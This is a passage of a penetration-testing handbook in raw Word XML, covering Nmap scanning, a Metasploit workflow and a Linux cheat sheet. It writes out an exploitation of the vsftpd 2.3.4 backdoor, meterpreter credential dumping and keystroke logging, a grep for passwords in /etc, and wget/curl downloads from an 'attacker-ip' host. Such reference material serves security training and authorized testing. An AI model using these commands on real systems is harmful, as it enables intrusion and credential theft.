    <w:p w14:paraId="7BFB3371" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t xml:space="preserve">        return "MEDIUM"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF166BE" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t xml:space="preserve">    else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFF680E" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t xml:space="preserve">        return "LOW"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A47C39F" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Prioritization Decision Tree:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2858C4" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE24545" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>Start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8861D3" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t xml:space="preserve">  ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1DBBEF" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>Is exploit publicly available? → Yes → Is it weaponized? → Yes → CRITICAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BFA954" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t xml:space="preserve">  ↓ No                                    ↓ No</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CFA567" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>Is service outdated? → Yes → Are there known CVEs? → Yes → HIGH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D092880" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t xml:space="preserve">  ↓ No                           ↓ No</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7363864C" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>Default credentials? → Yes → Service critical? → Yes → MEDIUM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C23FC9B" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t xml:space="preserve">  ↓ No                           ↓ No</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9EAED6" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>Informational finding → LOW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A60A21" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SECTION 4: TOOLS REFERENCE LIBRARY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DF6B48" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.1 Nmap Comprehensive Guide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B237416" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command Reference by Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A293C0C" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Basic Discovery:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF159D8" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7810AA3A" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># Ping sweep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325F6F74" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>nmap -sn 192.168.1.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12437CB3" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52"/>
    <w:p w14:paraId="4213A469" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># Quick port scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069731A1" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>nmap -T4 -F target.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7157AD06" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52"/>
    <w:p w14:paraId="4B95C095" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:lastRenderedPageBreak/>
        <w:t># Scan specific ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B09E247" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>nmap -p 22,80,443 target.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553AA8F1" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advanced Scanning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466FF5A6" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502FC1D0" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># Stealth scan with OS detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532B209A" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>nmap -sS -O target.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388E9E32" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52"/>
    <w:p w14:paraId="5257AD5E" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># Version detection with scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A2DAC0" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>nmap -sV -sC target.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAEA4EE" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52"/>
    <w:p w14:paraId="48FA2C9B" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># Aggressive scan (noisy but thorough)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408E1099" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>nmap -A target.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251F92B4" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scripting Engine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474BC40E" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AD1D8F" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># Vulnerability scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C53D3EF" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>nmap --script vuln target.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F6619F" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52"/>
    <w:p w14:paraId="750BFCE1" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># Safe scripts only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F1480F" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>nmap --script "safe" target.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E665F43" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52"/>
    <w:p w14:paraId="286151D3" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># Specific script category</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388CE63E" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>nmap --script "discovery" target.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1069A328" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Formats:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA4E5B6" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340D4917" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># All formats at once</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB9C640" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>nmap -oA scan_name target.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF78FB7" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:lastRenderedPageBreak/>
        <w:t># Creates: scan_name.nmap, scan_name.gnmap, scan_name.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D515319" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52"/>
    <w:p w14:paraId="53EDA40C" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># For report integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBB4284" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>nmap -oX report.xml target.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F399D8" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.2 Metasploit Framework Workflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C61CFC8" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Standard Operating Procedure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6CFD1B" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Database Initialization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5336B94B" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756F4CD5" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>service postgresql start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E3785F" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>msfdb init</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368DAB0E" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>msfconsole -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E80A0E" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Module Search Protocol:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D6B05A" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>msf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72382A82" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># Search by vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC3B7CF" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>search vsftpd 2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426F6055" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52"/>
    <w:p w14:paraId="45CF7884" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># Search by platform</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434F3F69" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>search platform:windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524088B8" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52"/>
    <w:p w14:paraId="10C9D210" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># Search by type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298C73C6" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>search type:exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C42431B" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploitation Template:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651523EB" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>msf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770FE8A7" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385D394B" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6BB801" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>set RHOSTS 10.0.2.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7EDC53" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:lastRenderedPageBreak/>
        <w:t>set RPORT 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D72D9A" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>check  # Verify vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FD316D" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5E238D" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Post-Exploitation Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0286A2EE" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>msf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02253B9D" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># Once meterpreter session is open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696C9D86" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E403F5" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>getuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74787783" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8DCE8E" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773A0210" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>keyscan_start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076E0FE9" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SECTION 5: CHEAT SHEETS &amp; QUICK REFERENCES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246506EF" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.1 Linux Command Cheat Sheet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C7B585" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528BA015" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51892DA1" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># Search for files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A857D3" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t xml:space="preserve">find / -name "*.conf" -type f </w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:t>&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533E076D" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t xml:space="preserve">grep -r "password" /etc/ </w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:t>&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAFCF45" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52"/>
    <w:p w14:paraId="2CAF4869" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># File transfers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B799C6A" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>python3 -m http.server 80  # Start web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63727828" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>wget http://attacker-ip/file.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397874B8" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>curl -O http://attacker-ip/file.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2276AE" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network Diagnostics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2FE820" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
